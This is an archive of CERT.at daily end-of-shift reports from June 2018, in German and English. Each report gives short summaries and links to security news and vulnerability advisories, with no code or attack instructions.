- Daily - CERT.at

Tageszusammenfassung - 15.06.2018
by Daily end-of-shift report 15 Jun '18

15 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 14-06-2018 18:00 − Freitag 15-06-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote ∗∗∗ --------------------------------------------- Kaspersky Lab announced it was temporarily halting its cooperation with Europol following the voting of a controversial motion in the European Parliament today. --------------------------------------------- https://www.bleepingcomputer.com/news/government/kaspersky-halts-europol-an… ∗∗∗ Decryptor Released for the Everbe Ransomware ∗∗∗ --------------------------------------------- A decryptor for the Everbe Ransomware was released by Michael Gillespie that allows victims to get their files back for free. It is not known how this ransomware is currently being distributed, but as long as victims have an unencrypted version of an encrypted file, they can use them to brute force the decryption key. --------------------------------------------- https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-e… ∗∗∗ Mechanics Behind Ransomware-as-a-Service ∗∗∗ --------------------------------------------- Ransomware is an increasingly serious concern, and this problem is getting worse over time. Initially, this malware began to compromise fixed targets such as individuals, but now the focus has changed and became much broader — from individuals to organizations. --------------------------------------------- https://resources.infosecinstitute.com/mechanics-behind-ransomware-as-a-ser… ∗∗∗ Old Botnets never Die, and DDG REFUSE to Fade Away ∗∗∗ --------------------------------------------- DDG is a mining botnet that specializes in exploiting SSH, Redis database and OrientDB database servers. We first caught it on October 25, 2017, at that time, DDG used version number 2020 and 2021, and we noticed that the botnet has two internally reserved domain names that had not been [...] --------------------------------------------- http://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-awa… ∗∗∗ Spectre-NG: Harte Kritik von OpenBSD-Entwickler Theo de Raadt ∗∗∗ --------------------------------------------- Die Veröffentlichung des jüngsten Spectre-NG-Bugs wurde hektisch vorgezogen, nachdem Theo de Raadt die Informationspolitik von Intel kritisierte. --------------------------------------------- http://heise.de/-4078903 ∗∗∗ 5 Millionen Mal heruntergeladen: Bösartige Docker-Container schürfen Monero ∗∗∗ --------------------------------------------- Zehn Monate lang waren Docker-Images mit Hintertür über Docker Hub verfügbar, obwohl die Verantwortlichen längst über den Schadcode informiert waren. --------------------------------------------- http://heise.de/-4079414 ∗∗∗ Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1 ∗∗∗ --------------------------------------------- The McAfee Labs Advanced Threat Research team has been investigating the Windows 10 platform. We have submitted several vulnerabilities already and have disclosed our research to Microsoft. Please refer to our vulnerability disclosure policy for further details or the post from earlier this week on Windows 10 Cortana vulnerabilities. --------------------------------------------- https://securingtomorrow.mcafee.com/mcafee-labs/unintended-clipboard-paste-… ∗∗∗ Fake Font Dropper ∗∗∗ --------------------------------------------- A website owner reached out to us to investigate a weird behavior on their site. It was randomly showing a popup window for a missing font and telling the visitors that they are unable to view the content of the site because their own computers are missing a required font by the website called "HoeflerText", [...] --------------------------------------------- http://labs.sucuri.net/?note=2018-06-14 ∗∗∗ Totally Pwning the Tapplock (the API way) ∗∗∗ --------------------------------------------- An awesome researcher contacted us on the back of our recent Tapplock pwnage. We had been looking at the local BLE unlock mechanism, however he focussed instead on the mobile app API. Vangelis Stykas (@evstykas) has found a way to unlock any lock, plus scrape users PII and home addresses. --------------------------------------------- https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-t… ===================== = Vulnerabilities = ===================== ∗∗∗ Natus Xltek NeuroWorks ∗∗∗ --------------------------------------------- This medical device advisory includes mitigations for stack-based buffer overflow and out-of-bounds read vulnerabilities in the Natus Xltek NeuroWorks software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-18-165-01 ∗∗∗ Siemens SCALANCE X Switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C ∗∗∗ --------------------------------------------- This advisory includes mitigation recommendations for a permissions, privileges, and access controls vulnerability reported in Siemens SCALANCE X switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-165-01 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (plexus-archiver), Fedora (chromium, kernel, and plexus-archiver), Mageia (firefox, gifsicle, jasper, leptonica, patch, perl-DBD-mysql, qt3, and scummvm), openSUSE (opencv), Oracle (kernel), Red Hat (kernel), Scientific Linux (kernel), SUSE (gpg2, nautilus, and postgresql96), and Ubuntu (gnupg2 and linux-raspi2). --------------------------------------------- https://lwn.net/Articles/757610/ ∗∗∗ Cisco IP Phone 7800 Series and 8800 Series Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ [R1] Nessus Agent 7.1.0 Fixes Multiple Third-party Vulnerabilities ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2018-09 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.06.2018
by Daily end-of-shift report 14 Jun '18

14 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 13-06-2018 18:00 − Donnerstag 14-06-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ SigSpoof: Signaturen fälschen mit GnuPG ∗∗∗ --------------------------------------------- In bestimmten Situationen lässt sich die Signaturprüfung von GnuPG in den Plugins für Thunderbird und Apple Mail austricksen. Der Grund: Über ungefilterte Ausgaben lassen sich Statusmeldungen des Kommandozeilentools fälschen. Doch der Angriff funktioniert nur unter sehr speziellen Bedingungen. (GPG, E-Mail) --------------------------------------------- https://www.golem.de/news/sigspoof-signaturen-faelschen-mit-gnupg-1806-1349… ∗∗∗ Lazy FPU: Intels Floating Point Unit kann geheime Daten leaken ∗∗∗ --------------------------------------------- Register der Floating Point Unit in Core I und wohl auch von einigen Xeon-Prozessoren können Ergebnisse vertraulicher Berechnungen verraten. Dazu ist jedoch ein lokaler Angriff mit Malware erforderlich, außerdem ein veraltetes Betriebssystem. (Intel, Amazon) --------------------------------------------- https://www.golem.de/news/lazy-fpu-intels-floating-point-unit-kann-geheime-… ∗∗∗ Microsoft Reveals Which Bugs It Won’t Patch ∗∗∗ --------------------------------------------- A draft document lays out its criteria for addressing various flaws and notes the exceptions. --------------------------------------------- https://threatpost.com/microsoft-reveals-which-bugs-it-wont-patch/132817/ ∗∗∗ A Bunch of Compromized Wordpress Sites, (Wed, Jun 13th) ∗∗∗ --------------------------------------------- A few days ago, one of our readers contacted reported an incident affecting his website based on Wordpress. He performed quick checks by himself and found some pieces of evidence: [...] --------------------------------------------- https://isc.sans.edu/diary/rss/23764 ∗∗∗ Tapplock Smart locks found to be physically and digitally vulnerable ∗∗∗ --------------------------------------------- Tapplock Smart locks contain several physical and digital vulnerabilities, each of which could allow an attacker to crack the lock with some attacks taking as little as two seconds to execute. --------------------------------------------- https://www.scmagazine.com/tapplock-smart-locks-found-to-be-physically-and-… ∗∗∗ Malspam Campaigns Using IQY Attachments to Bypass AV Filters and Install RATs ∗∗∗ --------------------------------------------- Malspam campaigns, such as ones being distributed by Necurs, are utilizing a new attachment type that is doing a good job in bypassing antivirus and mail filters. These IQY attachments are called Excel Web Query files and when opened will attempt to pull data from external sources. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malspam-campaigns-using-iqy-… ∗∗∗ Mac-Malware kann Sicherheits-Tools austricksen ∗∗∗ --------------------------------------------- Mit einer vermeintlichen Apple-Signatur ist es Schadsoftware möglich, bekannte Security-Tools zu umgehen. Das Problem besteht offenbar seit Jahren. --------------------------------------------- http://heise.de/-4077945 ∗∗∗ Ecos Secure Boot Stick: Forscher warnen vor Schwachstellen ∗∗∗ --------------------------------------------- Tests mit dem SBS-Stick 5.6.5 und der System-Management-Software 5.2.68 haben mehrere Angriffspunkte offenbart. Updates stehen bereit. --------------------------------------------- http://heise.de/-4078344 ∗∗∗ Schadcode per Git: Xcode-Update soll Schwachstelle beheben ∗∗∗ --------------------------------------------- Apple hat die Programmierumgebung aktualisiert, um Sicherheitslücken auszuräumen. Git-Nutzer sollten das Update zügig einspielen. --------------------------------------------- http://heise.de/-4078821 ∗∗∗ New CryptoMiner hijacks your Bitcoin transaction. Over 300,000 computers have been attacked. ∗∗∗ --------------------------------------------- Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account [...] --------------------------------------------- https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-t… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium and gnupg), Debian (spip), Fedora (pdns-recursor), Gentoo (adobe-flash, burp, quassel, and wget), openSUSE (bouncycastle and taglib), Oracle (kernel), SUSE (java-1_7_0-openjdk, java-1_8_0-openjdk, poppler, and samba), and Ubuntu (file, perl, and ruby1.9.1, ruby2.0, ruby2.3). --------------------------------------------- https://lwn.net/Articles/757531/ ∗∗∗ Custom Tokens - Critical - Arbitrary PHP code execution - SA-CONTRIB-2018-041 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2018-041 ∗∗∗ OpenSSL, Libgcrypt, LibreSSL: Zwei Schwachstellen ermöglichen u.a. einen Denial-of-Service-Angriff ∗∗∗ --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-1138/ https://www.openssl.org/news/secadv/20180612.txt ∗∗∗ Enigmail: Zwei Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-1155/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Algo Credit Manager ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22017118 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM® SPSS Statistics Server ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016900 ∗∗∗ IBM Security Bulletin: A privilege escalation vulnerability in nzhwinfo that affects IBM Netezza Platform Software clients. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015701 ∗∗∗ IBM Security Bulletin: Vulnerability in IBM HTTP Server affects Netezza Performance Portal ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016809 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition affect IBM Virtualization Engine TS7700 – October 2017, January 2018 and April 2018 ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012379 ∗∗∗ IBM Security Bulletin: IBM WebSphere Cast Iron Solution is affected by Tomcat vulnerabilities ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22017032 ∗∗∗ SigSpoof: Spoofing signatures in GnuPG, Enigmail, GPGTools and python-gnupg (CVE-2018-12020) ∗∗∗ --------------------------------------------- https://neopg.io/blog/gpg-signature-spoof/ ∗∗∗ SigSpoof 2: More ways to spoof signatures in GnuPG (CVE-2018-12019) ∗∗∗ --------------------------------------------- https://neopg.io/blog/enigmail-signature-spoof/ ∗∗∗ SigSpoof 3: Breaking signature verification in pass (Simple Password Store) (CVE-2018-12356) ∗∗∗ --------------------------------------------- https://neopg.io/blog/pass-signature-spoof/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.06.2018
by Daily end-of-shift report 13 Jun '18

13 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 12-06-2018 18:00 − Mittwoch 13-06-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ June 2018 Security Update Release ∗∗∗ --------------------------------------------- Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information about this month’s .. --------------------------------------------- https://blogs.technet.microsoft.com/msrc/2018/06/12/june-2018-security-upda… ∗∗∗ Windows NTFS Tricks von und für Pentester ∗∗∗ --------------------------------------------- Das SEC Consult Vulnerability Lab hat einen neuen Blogeintrag veröffentlicht, in welchem verschiedene NTFS-Dateisystemtricks aufgezeigt werden. Diese wurden in den letzten Jahren aus verschiedenen Quellen zusammengetragen bzw. vom SEC Consult Vulnerability Lab entdeckt sowie weiterentwickelt. Die Tricks führen .. --------------------------------------------- https://www.sec-consult.com/blog/2018/06/windows-ntfs-tricks-von-und-fuer-p… ∗∗∗ Subtle change could see a reduction in installation of malicious Chrome extensions ∗∗∗ --------------------------------------------- Google has made a subtle change to its Chrome browser, banning the inline installation of new extensions, thus .. --------------------------------------------- https://www.virusbulletin.com:443/blog/2018/06/subtle-change-could-see-redu… ∗∗∗ Feds Bust Dozens of Nigerian Email Scammers, but Your Inbox Still Isn’t Safe ∗∗∗ --------------------------------------------- The arrest of dozens of alleged Nigerian email scammers and their associates is a small, but important, .. --------------------------------------------- https://www.wired.com/story/feds-bust-nigerian-email-scammers ∗∗∗ Patchday: Microsoft verarztet 50 Sicherheitslücken ∗∗∗ --------------------------------------------- In vielen Windows-Versionen klafft unter anderem eine kritische Lücke in der DNS-Programmierschnittstelle. Sicherheitsupdates stehen bereit. --------------------------------------------- http://heise.de/-4077270 ∗∗∗ Botnetz "Trik": C&C-Server leakt Millionen von E-Mail-Adressen ∗∗∗ --------------------------------------------- Ein Forscher ist auf eine Spammer-Datenbank mit mehr als 43 Millionen Mail-Adressen gestoßen. Noch ist unklar, wie viele von ihnen schon zuvor geleakt wurden. --------------------------------------------- http://heise.de/-4077371 ∗∗∗ Exploit kits: Spring 2018 review ∗∗∗ --------------------------------------------- In this Spring 2018 snapshot, we review the top exploit kits .. --------------------------------------------- https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-r… ∗∗∗ June 2018 Office Update Release ∗∗∗ --------------------------------------------- The June 2018 Public Update releases for Office are now available! This month, there .. --------------------------------------------- https://blogs.technet.microsoft.com/office_sustained_engineering/2018/06/12… ===================== = Vulnerabilities = ===================== ∗∗∗ HPESBHF03850 rev.1 - HPE ProLiant, Synergy, and Moonshot Systems: Local Disclosure of Information, CVE-2018-3639 – Speculative Store Bypass and CVE-2018-3640 – Rogue System Register Read ∗∗∗ --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… ∗∗∗ Schneider Electric U.motion Builder ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-163-01 ∗∗∗ Siemens SCALANCE X Switches ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-163-02 ∗∗∗ Local File Inclusion vulnerability in Zenphoto ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN33124193/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.06.2018
by Daily end-of-shift report 12 Jun '18

12 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Montag 11-06-2018 18:00 − Dienstag 12-06-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Unprotected Server Exposes Weight Watchers Internal IT Infrastructure ∗∗∗ --------------------------------------------- Researchers found that a critical Weight Watchers server revealed its IT internal infrastructure. --------------------------------------------- https://threatpost.com/unprotected-server-exposes-weight-watchers-internal-… ∗∗∗ Hacker überfällt Linuxforums.org und erbeutet Daten von 276.000 Accounts ∗∗∗ --------------------------------------------- Ein Unbekannter hat Zugriff auf Interna von Linuxforums.org bekommen und dabei Nutzerdaten inklusive Passwörtern kopiert. --------------------------------------------- http://heise.de/-4076540 ∗∗∗ Android-Malware schürft Kryptogeld auf Fire-TV-Geräten ∗∗∗ --------------------------------------------- Ruckelnde Video-Streams und seltsame weiße Pop-Ups können Anzeichen für eine Schadcode-Infektion auf Fire TV und Fire TV Sticks sein. --------------------------------------------- http://heise.de/-4076706 ∗∗∗ IT-Security - Security-Fail: OnePlus 6 nicht gegen modifizierte Firmware abgesichert ∗∗∗ --------------------------------------------- Auch bei gesperrtem Bootloader kann ein beliebiges Image übertragen werden – Hersteller kündigt Patch an --------------------------------------------- https://derstandard.at/2000081439178/Security-Fail-OnePlus-6-nicht-gegen-mo… ∗∗∗ IT-Security - Bei Trump-Kim-Gipfel verteilt: Spionagebedenken um USB-Ventilatoren ∗∗∗ --------------------------------------------- Aufgrund der Hitze wurden Sackerl mit USB-Ventilatoren und Wasser verteilt – die könnten mit Malware infiziert sein --------------------------------------------- https://derstandard.at/2000081443928/Bei-Trump-Kim-Gipfel-verteilt-Bedenken… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco WebEx Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web framework of the https://try.webex.com page of Cisco WebEx could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of an affected system.The vulnerability is due to insufficient input validation of certain parameters that are passed to the affected .. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ VMSA-2018-0015 - VMware AirWatch Agent updates resolve remote code execution vulnerability. ∗∗∗ --------------------------------------------- The VMware AirWatch Agent for Android and Windows Mobile devices contain a remote code execution vulnerability in real time File Manager capabilities. This vulnerability may allow for unauthorized creation and execution of .. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2018-0015.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.06.2018
by Daily end-of-shift report 11 Jun '18

11 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Freitag 08-06-2018 18:00 − Montag 11-06-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Chile: Swift-Angriff hinter Wiper-Malware versteckt ∗∗∗ --------------------------------------------- Wenn ein Unternehmen mit Ransomware attackiert wird, geht es nicht immer um Erpressung. Bei einem Angriff auf die Banco de Chile soll die Software vor allem als Ablenkung eingesetzt worden sein. --------------------------------------------- https://www.golem.de/news/chile-swift-angriff-hinter-wiper-malware-versteck… ∗∗∗ Lenovo Finally Patches Ancient BlueBorne Bugs in Tab and Yoga Tablets ∗∗∗ --------------------------------------------- Lenovo patches several popular tablet models to protect against BlueBorne vulnerabilities first identified in September 2017. --------------------------------------------- https://threatpost.com/lenovo-finally-patches-ancient-blueborne-bugs-in-tab… ∗∗∗ Paper: EternalBlue: a prominent threat actor of 2017–2018 ∗∗∗ --------------------------------------------- We publish a paper by researchers from Quick Heal Security Labs in India, who study the EternalBlue and DoublePulsar exploits in full detail. --------------------------------------------- https://www.virusbulletin.com:443/blog/2018/06/paper-eternalblue-prominent-… ∗∗∗ Verschlüsselung: GnuPG verschärft Integritäts-Checks ∗∗∗ --------------------------------------------- Als Folge der Efail-Probleme erzwingt GnuPG 2.2.8 jetzt die Verwendung von Prüfcodes. Außerdem beseitigt das Update ein neu entdecktes Sicherheitsproblem. --------------------------------------------- http://heise.de/-4075908 ∗∗∗ Magento CC stealer reinfector ∗∗∗ --------------------------------------------- We have seen many times in the past few months how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, but we haven’t .. --------------------------------------------- http://labs.sucuri.net/?note=2018-06-08 ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-4225 openjdk-7 - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2018/dsa-4225 ∗∗∗ DSA-4220 firefox-esr - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2018/dsa-4220 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.06.2018
by Daily end-of-shift report 08 Jun '18

08 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 07-06-2018 18:00 − Freitag 08-06-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Gitea: Account von Github-Alternative kurzzeitig übernommen ∗∗∗ --------------------------------------------- Das Projekt Gitea erstellt eine leichtgewichtige Open-Source-Alternative zu Github. Ein Bot-Account des Projekts auf Github ist nun offenbar kurzzeitig übernommen worden, um Cryptominer zu verbreiten. Quellcode und Infrastruktur sollen nicht betroffen sein. --------------------------------------------- https://www.golem.de/news/gitea-account-von-github-alternative-kurzzeitig-u… ∗∗∗ Adobe: Flash-Exploit wird über Office-Dokumente verteilt ∗∗∗ --------------------------------------------- Flash-Exploits werden mittlerweile immer häufiger über Office-Dokumente verteilt, weil Browser die Inhalte kaum noch anzeigen. In einem aktuellen Fall werden Nutzer im arabischen Raum angegriffen. --------------------------------------------- https://www.golem.de/news/adobe-flash-exploit-wird-ueber-office-dokumente-v… ∗∗∗ Combo aus drei Sicherheitslücken bricht IP-Kameras von Foscam ∗∗∗ --------------------------------------------- Es gibt wichtige Sicherheitsupdates für verschiedene IP-Kameras von Foscam. --------------------------------------------- http://heise.de/-4074308 ===================== = Vulnerabilities = ===================== ∗∗∗ Rockwell Automation RSLinx Classic and FactoryTalk Linx Gateway ∗∗∗ --------------------------------------------- This advisory contains mitigation recommendations for an unquoted search path or element vulnerability in the Rockwell Automation RSLinix Classic software platform. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-158-01 ∗∗∗ Update: "Zero-Day" Sicherheitslücke in Adobe Flash Player - aktiv ausgenützt - Patches verfügbar ∗∗∗ --------------------------------------------- Update: "Zero-Day" Sicherheitslücke in Adobe Flash Player - aktiv ausgenützt - Patches verfügbar 7. Juni 2018 Update: 8. Juni 2018 Beschreibung Adobe hat bekanntgegeben, dass es aktuell eine kritische Sicherheitslücke in Adobe Flash Player gibt, die auch bereits aktiv ausgenützt wird. CVE-Nummer: CVE-2018-5002 Update: 8. Juni 2018 CVE-Nummern: CVE-2018-4945, CVE-2018-5000, CVE-2018-5001, CVE-2018-5002 Adobe hat ein entsprechendes Update [...] --------------------------------------------- http://www.cert.at/warnings/all/20180607.html ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (radare2), Debian (jruby), Fedora (elfutils and wireless-tools), openSUSE (glibc, mariadb, and xdg-utils), Oracle (kernel), Red Hat (chromium-browser and java-1.7.1-ibm), SUSE (ceph, icu, kernel-firmware, memcached, and xen), and Ubuntu (unbound). --------------------------------------------- https://lwn.net/Articles/756950/ ∗∗∗ Security vulnerabilities fixed in Firefox 60.0.2, ESR 60.0.2, and ESR 52.8.1 ∗∗∗ --------------------------------------------- critical - CVE-2018-6126: Heap buffer overflow rasterizing paths in SVG with Skia --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2018-14/ ∗∗∗ Synology-SA-17:79 SRM ∗∗∗ --------------------------------------------- This vulnerability allows remote authenticated users to execute arbitrary code via a susceptible version of Synology Router Manager --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_17_79 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.06.2018
by Daily end-of-shift report 07 Jun '18

07 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 06-06-2018 18:00 − Donnerstag 07-06-2018 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Prowli Malware Targeting Servers, Routers, and IoT Devices ∗∗∗ --------------------------------------------- After the discovery of massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world. Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code ... --------------------------------------------- https://thehackernews.com/2018/06/prowli-malware-botnet.html ∗∗∗ Crappy IoT on the high seas: Holes punched in hull of maritime security ∗∗∗ --------------------------------------------- Researchers: We can nudge ships off course Infosec Europe Years-old security issues mostly stamped out in enterprise technology remain in maritime environments, leaving ships vulnerable to hacking, tracking, and worse. --------------------------------------------- https://www.theregister.co.uk/2018/06/06/infosec_europe_maritime_security/ ∗∗∗ Cyber Europe 2018 – Get prepared for the next cyber crisis ∗∗∗ --------------------------------------------- EU Cybersecurity Agency ENISA organised an international cybersecurity exercise --------------------------------------------- https://www.enisa.europa.eu/news/enisa-news/cyber-europe-2018-get-prepared-… ∗∗∗ Retefe check ∗∗∗ --------------------------------------------- Check if your computer is infected with the Retefe banking trojan. --------------------------------------------- http://retefe-check.ch/ ∗∗∗ A Totally Tubular Treatise on TRITON and TriStation ∗∗∗ --------------------------------------------- Introduction In December 2017, FireEyes Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatis… ∗∗∗ Sicherheitsupdates: Kritische Lücken in Cisco IOS und Prime ∗∗∗ --------------------------------------------- In verschiedenen Netzwerkgeräten und -Software von Cisco klaffen teils kritische Lücken. Betroffene Admins sollten die verfügbaren Patches zügig installieren. --------------------------------------------- http://heise.de/-4072861 ===================== = Vulnerabilities = ===================== ∗∗∗ "Zero-Day" Sicherheitslücke in Adobe Flash Player - aktiv ausgenützt - Patches verfügbar ∗∗∗ --------------------------------------------- "Zero-Day" Sicherheitslücke in Adobe Flash Player - aktiv ausgenützt - Patches verfügbar 7. Juni 2018 Beschreibung Adobe hat bekanntgegeben, dass es aktuell eine kritische Sicherheitslücke in Adobe Flash Player gibt, die auch bereits aktiv ausgenützt wird. CVE-Nummer: CVE-2018-5002 Adobe hat ein entsprechendes Update veröffentlicht, die Details befinden sich unter https://helpx.adobe.com/security/products/flash-player/apsb18-19.html. --------------------------------------------- http://www.cert.at/warnings/all/20180607.html ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (memcached), Fedora (java-1.8.0-openjdk-aarch32, sqlite, and xen), Mageia (corosync, gimp, qtpass, and SDL_image), openSUSE (zziplib), Slackware (mozilla), SUSE (git and libvorbis), and Ubuntu (liblouis). --------------------------------------------- https://lwn.net/Articles/756853/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilites in IBM Java Runtime affect IBM Spectrum Protect Snapshot (formerly Tivoli Storage FlashCopy Manager) for VMware (CVE-2018-2579, CVE-2018-2602, CVE-2018-2603, CVE-2018-2633, CVE-2018-2783) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016041 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Protect (formerly Tivoli Storage Manager) for Virtual Environments: Data Protection for Hyper-V ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016028 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities have been fixed in IBM Security Identity Manager ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22013617 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the IBM GSKit component of IBM Spectrum Protect (formerly Tivoli Storage Manager) for Virtual Environments: Data Protection for Hyper-V ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015304 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.06.2018
by Daily end-of-shift report 06 Jun '18

06 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 05-06-2018 18:00 − Mittwoch 06-06-2018 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sofacy Group’s Parallel Attacks ∗∗∗ --------------------------------------------- Unit 42’s continued look at the Sofacy Group’s activity reveals the persistent targeting of government, diplomatic and other strategic organizations across North America and Europe.The post Sofacy Group’s Parallel Attacks appeared first on Palo Alto Networks Blog. --------------------------------------------- https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-pa… ∗∗∗ Converting PCAP Web Traffic to Apache Log ∗∗∗ --------------------------------------------- PCAP data can be really useful when you must investigate an incident but when the amount of PCAP files to analyse is counted in gigabytes, it may quickly become tricky to handle. Often, the first protocol to be analysed is HTTP because it remains a classic infection or communication vector used by malware. What if you could analyze HTTP connections like an Apache access log? This kind of log can be easily indexed/processed by many tools. --------------------------------------------- https://isc.sans.edu/diary/rss/23739 ∗∗∗ Researchers warn widespread Google Group misconfigurations are exposing sensitive data ∗∗∗ --------------------------------------------- A survey of 2.5 million domains looked for configurations publicly exposed, found 9,637 exposed organizations, then used a random sample of 171 public organizations to determine nearly 3,000 domains were leaking sensitive data. --------------------------------------------- https://www.scmagazine.com/researchers-find-widespread-google-group-misconf… ∗∗∗ VPNFilter Update - VPNFilter exploits endpoints, targets new devices ∗∗∗ --------------------------------------------- Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding "VPNFilter." In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints. --------------------------------------------- https://blog.talosintelligence.com/2018/06/vpnfilter-update.html ∗∗∗ Schwachstelle Zip Slip: Beim Entpacken ist Schadcode inklusive ∗∗∗ --------------------------------------------- Viele Coding-Bibliotheken sind beim Entpacken von Archiven angreifbar. Ist eine Attacke erfolgreich, könnte Schadcode auf Computer gelangen. --------------------------------------------- http://heise.de/-4070792 ∗∗∗ Warnung vor anenberg.store ∗∗∗ --------------------------------------------- Auf anenberg.store finden Konsument/innen 